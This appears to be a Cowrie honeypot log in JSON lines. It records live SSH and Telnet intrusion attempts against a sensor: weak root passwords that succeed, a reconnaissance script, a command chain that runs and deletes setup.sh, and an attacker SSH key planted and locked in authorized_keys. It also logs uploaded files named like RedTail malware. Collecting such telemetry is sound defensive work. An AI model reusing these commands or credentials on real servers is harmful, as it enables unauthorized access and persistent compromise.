{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.171537Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.172305Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.173939Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.175007Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.175827Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.176631Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.177974Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.178608Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.179293Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.179904Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.180632Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:43:57.181311Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:43:58.282763Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:43:58.283835Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:43:58.284726Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:44:01.120419Z","src_ip":"103.29.69.96","session":"7a6e8624fbab"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.157","src_port":43782,"dst_ip":"1.2.3.4","dst_port":22,"session":"14191e247c12","protocol":"ssh","message":"New connection: 193.32.162.157:43782 (1.2.3.4:22) [session: 14191e247c12]","sensor":"my-vps","timestamp":"2025-08-26T20:44:27.799793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:44:30.024935Z","src_ip":"193.32.162.157","session":"14191e247c12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:44:30.025779Z","src_ip":"193.32.162.157","session":"14191e247c12"}
{"eventid":"cowrie.login.success","username":"root","password":"UBUNTU123456","message":"login attempt [root/UBUNTU123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:44:39.212227Z","src_ip":"193.32.162.157","session":"14191e247c12"}
{"eventid":"cowrie.session.closed","duration":"16.4","message":"Connection lost after 16.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:44:44.181166Z","src_ip":"193.32.162.157","session":"14191e247c12"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.157","src_port":17780,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d13af17b9c1","protocol":"ssh","message":"New connection: 193.32.162.157:17780 (1.2.3.4:22) [session: 7d13af17b9c1]","sensor":"my-vps","timestamp":"2025-08-26T20:44:44.210056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:44:44.211105Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-26T20:44:44.240996Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.login.success","username":"root","password":"UBUNTU123456","message":"login attempt [root/UBUNTU123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:44:44.332906Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:44:51.100750Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.101589Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.133240Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.163916Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.166029Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.169052Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.171652Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.174502Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.175719Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:44:51.207225Z","src_ip":"193.32.162.157","session":"7d13af17b9c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43106,"dst_ip":"1.2.3.4","dst_port":22,"session":"4da2e6e24d3b","protocol":"ssh","message":"New connection: 212.227.235.229:43106 (1.2.3.4:22) [session: 4da2e6e24d3b]","sensor":"my-vps","timestamp":"2025-08-26T20:45:12.738953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:45:12.740174Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:45:12.979242Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.login.success","username":"root","password":"Mk123456","message":"login attempt [root/Mk123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:45:13.933745Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:45:14.439868Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:45:14.440621Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:45:14.441767Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:45:14.683540Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47454,"dst_ip":"1.2.3.4","dst_port":22,"session":"a058081f4b0b","protocol":"ssh","message":"New connection: 212.227.235.229:47454 (1.2.3.4:22) [session: a058081f4b0b]","sensor":"my-vps","timestamp":"2025-08-26T20:45:26.959546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:45:26.963315Z","src_ip":"212.227.235.229","session":"a058081f4b0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:45:27.210350Z","src_ip":"212.227.235.229","session":"a058081f4b0b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:45:28.848395Z","src_ip":"212.227.235.229","session":"a058081f4b0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38974,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ae852599ff1","protocol":"telnet","message":"New connection: 212.227.235.229:38974 (1.2.3.4:23) [session: 3ae852599ff1]","sensor":"my-vps","timestamp":"2025-08-26T20:46:02.691520Z"}
{"eventid":"cowrie.session.closed","duration":7.528333425521851,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:46:10.219781Z","src_ip":"212.227.235.229","session":"3ae852599ff1"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:46:19.364119Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57958,"dst_ip":"1.2.3.4","dst_port":22,"session":"963fba001d83","protocol":"ssh","message":"New connection: 217.72.205.35:57958 (1.2.3.4:22) [session: 963fba001d83]","sensor":"my-vps","timestamp":"2025-08-26T20:46:30.360410Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:46:30.361841Z","src_ip":"217.72.205.35","session":"963fba001d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35368,"dst_ip":"1.2.3.4","dst_port":22,"session":"d276c84d5429","protocol":"ssh","message":"New connection: 212.227.235.229:35368 (1.2.3.4:22) [session: d276c84d5429]","sensor":"my-vps","timestamp":"2025-08-26T20:46:42.315992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:46:43.122571Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
